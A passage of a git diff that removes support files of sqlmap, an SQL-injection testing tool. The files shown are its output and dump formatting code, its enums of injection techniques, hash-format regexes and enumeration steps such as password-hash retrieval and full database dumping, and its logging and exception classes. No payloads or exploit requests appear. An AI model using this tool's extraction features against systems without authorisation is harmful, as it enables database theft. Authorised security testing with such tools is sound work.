(administrator)%s" % (user, stringSettings)) - else: - self._write("[*] %s%s" % (user, stringSettings)) - - if settings: - settings.sort() - - for setting in settings: - self._write(" %s: %s" % (subHeader, setting)) - - if userSettings: - self.singleString("") - - def dbs(self, dbs): - self.lister("available databases", dbs, content_type=CONTENT_TYPE.DBS) - - def dbTables(self, dbTables): - if isinstance(dbTables, dict) and len(dbTables) > 0: - if hasattr(conf, "api"): - self._write(dbTables, content_type=CONTENT_TYPE.TABLES) - return - - maxlength = 0 - - for tables in dbTables.values(): - for table in tables: - if table and isListLike(table): - table = table[0] - - maxlength = max(maxlength, len(unsafeSQLIdentificatorNaming(normalizeUnicode(table) or unicode(table)))) - - lines = "-" * (int(maxlength) + 2) - - for db, tables in dbTables.items(): - tables.sort() - - self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db else "Current database") - - if len(tables) == 1: - self._write("[1 table]") - else: - self._write("[%d tables]" % len(tables)) - - self._write("+%s+" % lines) - - for table in tables: - if table and isListLike(table): - table = table[0] - - table = unsafeSQLIdentificatorNaming(table) - blank = " " * (maxlength - len(normalizeUnicode(table) or unicode(table))) - self._write("| %s%s |" % (table, blank)) - - self._write("+%s+\n" % lines) - elif dbTables is None or len(dbTables) == 0: - self.singleString("No tables found", content_type=CONTENT_TYPE.TABLES) - else: - self.string("tables", dbTables, content_type=CONTENT_TYPE.TABLES) - - def dbTableColumns(self, tableColumns, content_type=None): - if isinstance(tableColumns, dict) and len(tableColumns) > 0: - if hasattr(conf, "api"): - self._write(tableColumns, content_type=content_type) - return - - for db, tables in tableColumns.items(): - if not db: - db = "All" - - for table, columns in tables.items(): - maxlength1 = 0 - maxlength2 = 0 - - colType = None - - colList = columns.keys() - 
colList.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) - - for column in colList: - colType = columns[column] - - column = unsafeSQLIdentificatorNaming(column) - maxlength1 = max(maxlength1, len(column or "")) - maxlength2 = max(maxlength2, len(colType or "")) - - maxlength1 = max(maxlength1, len("COLUMN")) - lines1 = "-" * (maxlength1 + 2) - - if colType is not None: - maxlength2 = max(maxlength2, len("TYPE")) - lines2 = "-" * (maxlength2 + 2) - - self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db else "Current database", unsafeSQLIdentificatorNaming(table))) - - if len(columns) == 1: - self._write("[1 column]") - else: - self._write("[%d columns]" % len(columns)) - - if colType is not None: - self._write("+%s+%s+" % (lines1, lines2)) - else: - self._write("+%s+" % lines1) - - blank1 = " " * (maxlength1 - len("COLUMN")) - - if colType is not None: - blank2 = " " * (maxlength2 - len("TYPE")) - - if colType is not None: - self._write("| Column%s | Type%s |" % (blank1, blank2)) - self._write("+%s+%s+" % (lines1, lines2)) - else: - self._write("| Column%s |" % blank1) - self._write("+%s+" % lines1) - - for column in colList: - colType = columns[column] - - column = unsafeSQLIdentificatorNaming(column) - blank1 = " " * (maxlength1 - len(column)) - - if colType is not None: - blank2 = " " * (maxlength2 - len(colType)) - self._write("| %s%s | %s%s |" % (column, blank1, colType, blank2)) - else: - self._write("| %s%s |" % (column, blank1)) - - if colType is not None: - self._write("+%s+%s+\n" % (lines1, lines2)) - else: - self._write("+%s+\n" % lines1) - - def dbTablesCount(self, dbTables): - if isinstance(dbTables, dict) and len(dbTables) > 0: - if hasattr(conf, "api"): - self._write(dbTables, content_type=CONTENT_TYPE.COUNT) - return - - maxlength1 = len("Table") - maxlength2 = len("Entries") - - for ctables in dbTables.values(): - for tables in ctables.values(): - for table in tables: - maxlength1 = max(maxlength1, 
len(normalizeUnicode(table) or unicode(table))) - - for db, counts in dbTables.items(): - self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db else "Current database") - - lines1 = "-" * (maxlength1 + 2) - blank1 = " " * (maxlength1 - len("Table")) - lines2 = "-" * (maxlength2 + 2) - blank2 = " " * (maxlength2 - len("Entries")) - - self._write("+%s+%s+" % (lines1, lines2)) - self._write("| Table%s | Entries%s |" % (blank1, blank2)) - self._write("+%s+%s+" % (lines1, lines2)) - - sortedCounts = counts.keys() - sortedCounts.sort(reverse=True) - - for count in sortedCounts: - tables = counts[count] - - if count is None: - count = "Unknown" - - tables.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) - - for table in tables: - blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or unicode(table))) - blank2 = " " * (maxlength2 - len(str(count))) - self._write("| %s%s | %d%s |" % (table, blank1, count, blank2)) - - self._write("+%s+%s+\n" % (lines1, lines2)) - else: - logger.error("unable to retrieve the number of entries for any table") - - def dbTableValues(self, tableValues): - replication = None - rtable = None - dumpFP = None - appendToFile = False - warnFile = False - - if tableValues is None: - return - - db = tableValues["__infos__"]["db"] - if not db: - db = "All" - table = tableValues["__infos__"]["table"] - - if hasattr(conf, "api"): - self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE) - return - - dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) - - if conf.dumpFormat == DUMP_FORMAT.SQLITE: - replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db))) - elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): - if not os.path.isdir(dumpDbPath): - try: - os.makedirs(dumpDbPath, 0755) - except: - warnFile = True - - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db))) - dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % 
(_, hashlib.md5(unicodeencode(db)).hexdigest()[:8])) - - if not os.path.isdir(dumpDbPath): - try: - os.makedirs(dumpDbPath, 0755) - except Exception, ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapdb") - except IOError, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) - - warnMsg = "unable to create dump directory " - warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex)) - warnMsg += "Using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) - - dumpDbPath = tempDir - - dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())) - if not os.path.isfile(dumpFileName): - try: - openFile(dumpFileName, "w+b").close() - except SqlmapSystemException: - raise - except: - warnFile = True - - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table))) - if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table))) - dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower())) - else: - dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) - - appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop)) - dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE) - - count = int(tableValues["__infos__"]["count"]) - separator = str() - field = 1 - fields = len(tableValues) - 1 - - columns = prioritySortColumns(tableValues.keys()) - - if conf.col: - cols = conf.col.split(',') - columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0) - - for column in columns: - 
if column != "__infos__": - info = tableValues[column] - lines = "-" * (int(info["length"]) + 2) - separator += "+%s" % lines - - separator += "+" - self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db else "Current database", unsafeSQLIdentificatorNaming(table))) - - if conf.dumpFormat == DUMP_FORMAT.SQLITE: - cols = [] - - for column in columns: - if column != "__infos__": - colType = Replication.INTEGER - - for value in tableValues[column]['values']: - try: - if not value or value == " ": # NULL - continue - - int(value) - except ValueError: - colType = None - break - - if colType is None: - colType = Replication.REAL - - for value in tableValues[column]['values']: - try: - if not value or value == " ": # NULL - continue - - float(value) - except ValueError: - colType = None - break - - cols.append((unsafeSQLIdentificatorNaming(column), colType if colType else Replication.TEXT)) - - rtable = replication.createTable(table, cols) - elif conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "\n\n\n") - dataToDumpFile(dumpFP, "\n" % UNICODE_ENCODING) - dataToDumpFile(dumpFP, "%s\n" % ("%s%s" % ("%s." 
% db if METADB_SUFFIX not in db else "", table))) - dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) - dataToDumpFile(dumpFP, "\n\n\n\n\n\n") - - if count == 1: - self._write("[1 entry]") - else: - self._write("[%d entries]" % count) - - self._write(separator) - - for column in columns: - if column != "__infos__": - info = tableValues[column] - - column = unsafeSQLIdentificatorNaming(column) - maxlength = int(info["length"]) - blank = " " * (maxlength - len(column)) - - self._write("| %s%s" % (column, blank), newline=False) - - if not appendToFile: - if conf.dumpFormat == DUMP_FORMAT.CSV: - if field == fields: - dataToDumpFile(dumpFP, "%s" % safeCSValue(column)) - else: - dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel)) - elif conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "" % cgi.escape(column).encode("ascii", "xmlcharrefreplace")) - - field += 1 - - if conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "\n\n\n\n") - - self._write("|\n%s" % separator) - - if conf.dumpFormat == DUMP_FORMAT.CSV: - dataToDumpFile(dumpFP, "\n" if not appendToFile else "") - - elif conf.dumpFormat == DUMP_FORMAT.SQLITE: - rtable.beginTransaction() - - if count > TRIM_STDOUT_DUMP_SIZE: - warnMsg = "console output will be trimmed to " - warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE - warnMsg += "large table size" - logger.warning(warnMsg) - - for i in xrange(count): - console = (i >= count - TRIM_STDOUT_DUMP_SIZE) - field = 1 - values = [] - - if conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "") - - for column in columns: - if column != "__infos__": - info = tableValues[column] - - if len(info["values"]) <= i: - continue - - if info["values"][i] is None: - value = u'' - else: - value = getUnicode(info["values"][i]) - value = DUMP_REPLACEMENTS.get(value, value) - - values.append(value) - maxlength = int(info["length"]) - blank = " " * (maxlength - len(value)) - self._write("| %s%s" % (value, blank), newline=False, 
console=console) - - if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value: - try: - mimetype = magic.from_buffer(value, mime=True) - if any(mimetype.startswith(_) for _ in ("application", "image")): - if not os.path.isdir(dumpDbPath): - os.makedirs(dumpDbPath, 0755) - - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column))) - filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) - warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) - logger.warn(warnMsg) - - with open(filepath, "wb") as f: - _ = safechardecode(value, True) - f.write(_) - except magic.MagicException, err: - logger.debug(str(err)) - - if conf.dumpFormat == DUMP_FORMAT.CSV: - if field == fields: - dataToDumpFile(dumpFP, "%s" % safeCSValue(value)) - else: - dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel)) - elif conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "" % cgi.escape(value).encode("ascii", "xmlcharrefreplace")) - - field += 1 - - if conf.dumpFormat == DUMP_FORMAT.SQLITE: - try: - rtable.insert(values) - except SqlmapValueException: - pass - elif conf.dumpFormat == DUMP_FORMAT.CSV: - dataToDumpFile(dumpFP, "\n") - elif conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "\n") - - self._write("|", console=console) - - self._write("%s\n" % separator) - - if conf.dumpFormat == DUMP_FORMAT.SQLITE: - rtable.endTransaction() - logger.info("table '%s.%s' dumped to sqlite3 database '%s'" % (db, table, replication.dbpath)) - - elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): - if conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "\n
%s
%s
\n\n") - else: - dataToDumpFile(dumpFP, "\n") - dumpFP.close() - - msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName) - if not warnFile: - logger.info(msg) - else: - logger.warn(msg) - - def dbColumns(self, dbColumnsDict, colConsider, dbs): - if hasattr(conf, "api"): - self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS) - return - - for column in dbColumnsDict.keys(): - if colConsider == "1": - colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column) - else: - colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column) - - msg = "column%s found in the " % colConsiderStr - msg += "following databases:" - self._write(msg) - - _ = {} - - for db, tblData in dbs.items(): - for tbl, colData in tblData.items(): - for col, dataType in colData.items(): - if column.lower() in col.lower(): - if db in _: - if tbl in _[db]: - _[db][tbl][col] = dataType - else: - _[db][tbl] = {col: dataType} - else: - _[db] = {} - _[db][tbl] = {col: dataType} - - continue - - self.dbTableColumns(_) - - def query(self, query, queryRes): - self.string(query, queryRes, content_type=CONTENT_TYPE.SQL_QUERY) - - def rFile(self, fileData): - self.lister("files saved to", fileData, sort=False, content_type=CONTENT_TYPE.FILE_READ) - - def registerValue(self, registerData): - self.string("Registry key value data", registerData, content_type=CONTENT_TYPE.REG_READ, sort=False) - -# object to manage how to print the retrieved queries output to -# standard output and sessions file -dumper = Dump() diff --git a/lib/core/enums.py b/lib/core/enums.py deleted file mode 100644 index 1bb4fcbb..00000000 --- a/lib/core/enums.py +++ /dev/null @@ -1,353 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -class PRIORITY: - LOWEST = -100 - LOWER = -50 - LOW = -10 - NORMAL = 0 - HIGH = 10 - HIGHER = 50 - HIGHEST = 100 - -class SORT_ORDER: - 
FIRST = 0 - SECOND = 1 - THIRD = 2 - FOURTH = 3 - FIFTH = 4 - LAST = 100 - -class DBMS: - ACCESS = "Microsoft Access" - DB2 = "IBM DB2" - FIREBIRD = "Firebird" - MAXDB = "SAP MaxDB" - MSSQL = "Microsoft SQL Server" - MYSQL = "MySQL" - ORACLE = "Oracle" - PGSQL = "PostgreSQL" - SQLITE = "SQLite" - SYBASE = "Sybase" - HSQLDB = "HSQLDB" - -class DBMS_DIRECTORY_NAME: - ACCESS = "access" - DB2 = "db2" - FIREBIRD = "firebird" - MAXDB = "maxdb" - MSSQL = "mssqlserver" - MYSQL = "mysql" - ORACLE = "oracle" - PGSQL = "postgresql" - SQLITE = "sqlite" - SYBASE = "sybase" - HSQLDB = "hsqldb" - -class CUSTOM_LOGGING: - PAYLOAD = 9 - TRAFFIC_OUT = 8 - TRAFFIC_IN = 7 - -class OS: - LINUX = "Linux" - WINDOWS = "Windows" - -class PLACE: - GET = "GET" - POST = "POST" - URI = "URI" - COOKIE = "Cookie" - USER_AGENT = "User-Agent" - REFERER = "Referer" - HOST = "Host" - CUSTOM_POST = "(custom) POST" - CUSTOM_HEADER = "(custom) HEADER" - -class POST_HINT: - SOAP = "SOAP" - JSON = "JSON" - JSON_LIKE = "JSON-like" - MULTIPART = "MULTIPART" - XML = "XML (generic)" - ARRAY_LIKE = "Array-like" - -class HTTPMETHOD: - GET = "GET" - POST = "POST" - HEAD = "HEAD" - PUT = "PUT" - DELETE = "DELETE" - TRACE = "TRACE" - OPTIONS = "OPTIONS" - CONNECT = "CONNECT" - PATCH = "PATCH" - -class NULLCONNECTION: - HEAD = "HEAD" - RANGE = "Range" - SKIP_READ = "skip-read" - -class REFLECTIVE_COUNTER: - MISS = "MISS" - HIT = "HIT" - -class CHARSET_TYPE: - BINARY = 1 - DIGITS = 2 - HEXADECIMAL = 3 - ALPHA = 4 - ALPHANUM = 5 - -class HEURISTIC_TEST: - CASTED = 1 - NEGATIVE = 2 - POSITIVE = 3 - -class HASH: - MYSQL = r'(?i)\A\*[0-9a-f]{40}\Z' - MYSQL_OLD = r'(?i)\A(?![0-9]+\Z)[0-9a-f]{16}\Z' - POSTGRES = r'(?i)\Amd5[0-9a-f]{32}\Z' - MSSQL = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{40}\Z' - MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z' - MSSQL_NEW = r'(?i)\A0x0200[0-9a-f]{8}[0-9a-f]{128}\Z' - ORACLE = r'(?i)\As:[0-9a-f]{60}\Z' - ORACLE_OLD = r'(?i)\A[01-9a-f]{16}\Z' - MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z' - 
SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z' - SHA224_GENERIC = r'(?i)\A[0-9a-f]{28}\Z' - SHA384_GENERIC = r'(?i)\A[0-9a-f]{48}\Z' - SHA512_GENERIC = r'(?i)\A[0-9a-f]{64}\Z' - CRYPT_GENERIC = r'(?i)\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z' - WORDPRESS = r'(?i)\A\$P\$[./0-9A-Za-z]{31}\Z' - -# Reference: http://www.zytrax.com/tech/web/mobile_ids.html -class MOBILES: - BLACKBERRY = ("BlackBerry 9900", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+") - GALAXY = ("Samsung Galaxy S", "Mozilla/5.0 (Linux; U; Android 2.2; en-US; SGH-T959D Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1") - HP = ("HP iPAQ 6365", "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; HP iPAQ h6300)") - HTC = ("HTC Sensation", "Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30") - IPHONE = ("Apple iPhone 4s", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B179 Safari/7534.48.3") - NEXUS = ("Google Nexus 7", "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19") - NOKIA = ("Nokia N97", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344") - -class PROXY_TYPE: - HTTP = "HTTP" - HTTPS = "HTTPS" - SOCKS4 = "SOCKS4" - SOCKS5 = "SOCKS5" - -class REGISTRY_OPERATION: - READ = "read" - ADD = "add" - DELETE = "delete" - -class DUMP_FORMAT: - CSV = "CSV" - HTML = "HTML" - SQLITE = "SQLITE" - -class HTTP_HEADER: - ACCEPT = "Accept" - ACCEPT_CHARSET = "Accept-Charset" - ACCEPT_ENCODING = "Accept-Encoding" - ACCEPT_LANGUAGE = "Accept-Language" - AUTHORIZATION = "Authorization" - CACHE_CONTROL = "Cache-Control" 
- CONNECTION = "Connection" - CONTENT_ENCODING = "Content-Encoding" - CONTENT_LENGTH = "Content-Length" - CONTENT_RANGE = "Content-Range" - CONTENT_TYPE = "Content-Type" - COOKIE = "Cookie" - EXPIRES = "Expires" - HOST = "Host" - IF_MODIFIED_SINCE = "If-Modified-Since" - LAST_MODIFIED = "Last-Modified" - LOCATION = "Location" - PRAGMA = "Pragma" - PROXY_AUTHORIZATION = "Proxy-Authorization" - PROXY_CONNECTION = "Proxy-Connection" - RANGE = "Range" - REFERER = "Referer" - SERVER = "Server" - SET_COOKIE = "Set-Cookie" - TRANSFER_ENCODING = "Transfer-Encoding" - URI = "URI" - USER_AGENT = "User-Agent" - VIA = "Via" - X_POWERED_BY = "X-Powered-By" - -class EXPECTED: - BOOL = "bool" - INT = "int" - -class OPTION_TYPE: - BOOLEAN = "boolean" - INTEGER = "integer" - FLOAT = "float" - STRING = "string" - -class HASHDB_KEYS: - DBMS = "DBMS" - CHECK_WAF_RESULT = "CHECK_WAF_RESULT" - CONF_TMP_PATH = "CONF_TMP_PATH" - KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS" - KB_BRUTE_COLUMNS = "KB_BRUTE_COLUMNS" - KB_BRUTE_TABLES = "KB_BRUTE_TABLES" - KB_CHARS = "KB_CHARS" - KB_DYNAMIC_MARKINGS = "KB_DYNAMIC_MARKINGS" - KB_INJECTIONS = "KB_INJECTIONS" - KB_ERROR_CHUNK_LENGTH = "KB_ERROR_CHUNK_LENGTH" - KB_XP_CMDSHELL_AVAILABLE = "KB_XP_CMDSHELL_AVAILABLE" - OS = "OS" - -class REDIRECTION: - YES = "Y" - NO = "N" - -class PAYLOAD: - SQLINJECTION = { - 1: "boolean-based blind", - 2: "error-based", - 3: "inline query", - 4: "stacked queries", - 5: "AND/OR time-based blind", - 6: "UNION query", - } - - PARAMETER = { - 1: "Unescaped numeric", - 2: "Single quoted string", - 3: "LIKE single quoted string", - 4: "Double quoted string", - 5: "LIKE double quoted string", - } - - RISK = { - 0: "No risk", - 1: "Low risk", - 2: "Medium risk", - 3: "High risk", - } - - CLAUSE = { - 0: "Always", - 1: "WHERE", - 2: "GROUP BY", - 3: "ORDER BY", - 4: "LIMIT", - 5: "OFFSET", - 6: "TOP", - 7: "Table name", - 8: "Column name", - } - - class METHOD: - COMPARISON = "comparison" - GREP = "grep" - TIME = "time" - UNION 
= "union" - - class TECHNIQUE: - BOOLEAN = 1 - ERROR = 2 - QUERY = 3 - STACKED = 4 - TIME = 5 - UNION = 6 - - class WHERE: - ORIGINAL = 1 - NEGATIVE = 2 - REPLACE = 3 - -class WIZARD: - BASIC = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba") - INTERMEDIATE = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getUsers", "getDbs", "getTables", "getSchema", "excludeSysDbs") - ALL = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getHostname", "getUsers", "getPasswordHashes", "getPrivileges", "getRoles", "dumpAll") - -class ADJUST_TIME_DELAY: - DISABLE = -1 - NO = 0 - YES = 1 - -class WEB_API: - PHP = "php" - ASP = "asp" - ASPX = "aspx" - JSP = "jsp" - -class CONTENT_TYPE: - TECHNIQUES = 0 - DBMS_FINGERPRINT = 1 - BANNER = 2 - CURRENT_USER = 3 - CURRENT_DB = 4 - HOSTNAME = 5 - IS_DBA = 6 - USERS = 7 - PASSWORDS = 8 - PRIVILEGES = 9 - ROLES = 10 - DBS = 11 - TABLES = 12 - COLUMNS = 13 - SCHEMA = 14 - COUNT = 15 - DUMP_TABLE = 16 - SEARCH = 17 - SQL_QUERY = 18 - COMMON_TABLES = 19 - COMMON_COLUMNS = 20 - FILE_READ = 21 - FILE_WRITE = 22 - OS_CMD = 23 - REG_READ = 24 - -PART_RUN_CONTENT_TYPES = { - "checkDbms": CONTENT_TYPE.TECHNIQUES, - "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT, - "getBanner": CONTENT_TYPE.BANNER, - "getCurrentUser": CONTENT_TYPE.CURRENT_USER, - "getCurrentDb": CONTENT_TYPE.CURRENT_DB, - "getHostname": CONTENT_TYPE.HOSTNAME, - "isDba": CONTENT_TYPE.IS_DBA, - "getUsers": CONTENT_TYPE.USERS, - "getPasswordHashes": CONTENT_TYPE.PASSWORDS, - "getPrivileges": CONTENT_TYPE.PRIVILEGES, - "getRoles": CONTENT_TYPE.ROLES, - "getDbs": CONTENT_TYPE.DBS, - "getTables": CONTENT_TYPE.TABLES, - "getColumns": CONTENT_TYPE.COLUMNS, - "getSchema": CONTENT_TYPE.SCHEMA, - "getCount": CONTENT_TYPE.COUNT, - "dumpTable": CONTENT_TYPE.DUMP_TABLE, - "search": CONTENT_TYPE.SEARCH, - "sqlQuery": CONTENT_TYPE.SQL_QUERY, - "tableExists": CONTENT_TYPE.COMMON_TABLES, - "columnExists": CONTENT_TYPE.COMMON_COLUMNS, - "readFile": CONTENT_TYPE.FILE_READ, - 
"writeFile": CONTENT_TYPE.FILE_WRITE, - "osCmd": CONTENT_TYPE.OS_CMD, - "regRead": CONTENT_TYPE.REG_READ -} - -class CONTENT_STATUS: - IN_PROGRESS = 0 - COMPLETE = 1 - -class AUTH_TYPE: - BASIC = "basic" - DIGEST = "digest" - NTLM = "ntlm" - PKI = "pki" - -class AUTOCOMPLETE_TYPE: - SQL = 0 - OS = 1 - SQLMAP = 2 diff --git a/lib/core/exception.py b/lib/core/exception.py deleted file mode 100644 index 2b09271c..00000000 --- a/lib/core/exception.py +++ /dev/null @@ -1,75 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -class SqlmapBaseException(Exception): - pass - -class SqlmapCompressionException(SqlmapBaseException): - pass - -class SqlmapConnectionException(SqlmapBaseException): - pass - -class SqlmapDataException(SqlmapBaseException): - pass - -class SqlmapFilePathException(SqlmapBaseException): - pass - -class SqlmapGenericException(SqlmapBaseException): - pass - -class SqlmapInstallationException(SqlmapBaseException): - pass - -class SqlmapMissingDependence(SqlmapBaseException): - pass - -class SqlmapMissingMandatoryOptionException(SqlmapBaseException): - pass - -class SqlmapMissingPrivileges(SqlmapBaseException): - pass - -class SqlmapNoneDataException(SqlmapBaseException): - pass - -class SqlmapNotVulnerableException(SqlmapBaseException): - pass - -class SqlmapSilentQuitException(SqlmapBaseException): - pass - -class SqlmapUserQuitException(SqlmapBaseException): - pass - -class SqlmapShellQuitException(SqlmapBaseException): - pass - -class SqlmapSyntaxException(SqlmapBaseException): - pass - -class SqlmapSystemException(SqlmapBaseException): - pass - -class SqlmapThreadException(SqlmapBaseException): - pass - -class SqlmapTokenException(SqlmapBaseException): - pass - -class SqlmapUndefinedMethod(SqlmapBaseException): - pass - -class SqlmapUnsupportedDBMSException(SqlmapBaseException): - pass - -class 
SqlmapUnsupportedFeatureException(SqlmapBaseException): - pass - -class SqlmapValueException(SqlmapBaseException): - pass diff --git a/lib/core/log.py b/lib/core/log.py deleted file mode 100644 index 55386e04..00000000 --- a/lib/core/log.py +++ /dev/null @@ -1,44 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import logging -import sys - -from lib.core.enums import CUSTOM_LOGGING - -logging.addLevelName(CUSTOM_LOGGING.PAYLOAD, "PAYLOAD") -logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_OUT, "TRAFFIC OUT") -logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_IN, "TRAFFIC IN") - -LOGGER = logging.getLogger("sqlmapLog") - -LOGGER_HANDLER = None -try: - from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler - - disableColor = False - - for argument in sys.argv: - if "disable-col" in argument: - disableColor = True - break - - if disableColor: - LOGGER_HANDLER = logging.StreamHandler(sys.stdout) - else: - LOGGER_HANDLER = ColorizingStreamHandler(sys.stdout) - LOGGER_HANDLER.level_map[logging.getLevelName("PAYLOAD")] = (None, "cyan", False) - LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC OUT")] = (None, "magenta", False) - LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC IN")] = ("magenta", None, False) -except ImportError: - LOGGER_HANDLER = logging.StreamHandler(sys.stdout) - -FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S") - -LOGGER_HANDLER.setFormatter(FORMATTER) -LOGGER.addHandler(LOGGER_HANDLER) -LOGGER.setLevel(logging.INFO) diff --git a/lib/core/option.py b/lib/core/option.py deleted file mode 100644 index ad3b590f..00000000 --- a/lib/core/option.py +++ /dev/null @@ -1,2605 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import glob -import inspect -import logging 
-import httplib -import os -import random -import re -import socket -import string -import sys -import tempfile -import threading -import time -import urllib2 -import urlparse - -import lib.controller.checks -import lib.core.common -import lib.core.threads -import lib.core.convert -import lib.request.connect -import lib.utils.search - -from lib.controller.checks import checkConnection -from lib.core.common import Backend -from lib.core.common import boldifyMessage -from lib.core.common import checkFile -from lib.core.common import dataToStdout -from lib.core.common import getPublicTypeMembers -from lib.core.common import getSafeExString -from lib.core.common import extractRegexResult -from lib.core.common import filterStringValue -from lib.core.common import findPageForms -from lib.core.common import getConsoleWidth -from lib.core.common import getFileItems -from lib.core.common import getFileType -from lib.core.common import getUnicode -from lib.core.common import isListLike -from lib.core.common import normalizePath -from lib.core.common import ntToPosixSlashes -from lib.core.common import openFile -from lib.core.common import parseTargetDirect -from lib.core.common import parseTargetUrl -from lib.core.common import paths -from lib.core.common import randomStr -from lib.core.common import readCachedFileContent -from lib.core.common import readInput -from lib.core.common import resetCookieJar -from lib.core.common import runningAsAdmin -from lib.core.common import safeExpandUser -from lib.core.common import setOptimize -from lib.core.common import setPaths -from lib.core.common import singleTimeWarnMessage -from lib.core.common import UnicodeRawConfigParser -from lib.core.common import urldecode -from lib.core.convert import base64unpickle -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import mergedOptions -from lib.core.data import queries -from lib.core.datatype import 